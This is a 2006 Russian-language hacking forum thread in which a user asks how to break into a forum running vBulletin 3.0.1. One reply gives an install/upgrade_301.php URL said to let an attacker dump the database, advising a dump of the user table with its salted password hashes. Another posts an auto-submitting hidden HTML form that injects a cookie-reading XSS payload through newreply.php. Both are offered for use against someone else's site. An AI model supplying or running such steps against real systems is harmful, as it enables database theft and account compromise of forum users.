Вопрос про уязвимости в vbulletin 3.0.1

Discussion in 'Песочница' started by Manoz, 3 Aug 2006.

  1. Manoz

    Manoz Elder - Старейшина

    Joined:
    15 Feb 2005
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    Есть форум с vb 3.0.1. Какие уязвимости у него есть? А то тут старые посты стерли и не могу найти инфу.
    Спасиб ;)
     
  2. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    скорее всего это фэйк, версию намерено изменили и скрывают..... хотя хз
     
  3. LoneWolf666

    LoneWolf666 Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    207
    Likes Received:
    121
    Reputations:
    12
    www.site forumpath*.domen/install/upgrade_301.php?step=SomeWord
    Возможность сделать дамп базы.
    Относительно стабильно работает на 3.0.1.

    *либо www.forum.site.domen либо www.site.domen/forum/...
    Попробуй.
    Хеши - солёные. Соль - последния столбец таблицы.
    Если покатит - советую делать дамп таблицы user (мэйби vb_user)
    Будет проще, меньше размером, да и нах тебе остальное?
     
    1 person likes this.
  4. Manoz

    Manoz Elder - Старейшина

    Joined:
    15 Feb 2005
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    Ща попробую! Спасибо за инфу! ++

    Эх жалко. Действительно 3.0.1 мулька. =(
     
    #4 Manoz, 8 Aug 2006
    Last edited: 8 Aug 2006
    1 person likes this.
  5. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    а так чаще всего =))) просто нусам подумай, у кого может стоять такие древние форумы?? =))) они обычно сами орут "ВЫШЛА НОВАЯ ВЕРСИЯ УСТАНОВИТЕ!"
     
  6. JIaMo

    JIaMo New Member

    Joined:
    24 Sep 2006
    Messages:
    10
    Likes Received:
    3
    Reputations:
    -2
    а есть тут еще уязвимости??
     
  7. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    где тут? в этой версии?
     
  8. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Программа: vBulletin 3.0.1

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание: Обнаружена уязвимость в vBulletin. Удаленный атакующий может получить доступ к важной информации пользователей.

    Пример/Эксплоит:

    <form action="http://host/newreply.php" name="vbform"
    method="post" style='visibility:hidden'>
    <input name="WYSIWYG_HTML"
    value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
    <input name="do" value="postreply"/>
    <input name="t" value="123456" />
    <input name="p" value="123456" />
    <input type="submit" class="button" name="preview"/>
    </form>
    &lt;script&gt;
    document.all.preview.click();
    &lt;/script&gt;
     
  9. JIaMo

    JIaMo New Member

    Joined:
    24 Sep 2006
    Messages:
    10
    Likes Received:
    3
    Reputations:
    -2
    и че с этим делать?
     
  10. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    На хер намотай...
     
    _________________________
  11. JIaMo

    JIaMo New Member

    Joined:
    24 Sep 2006
    Messages:
    10
    Likes Received:
    3
    Reputations:
    -2
    спасиб блин
     
Loading...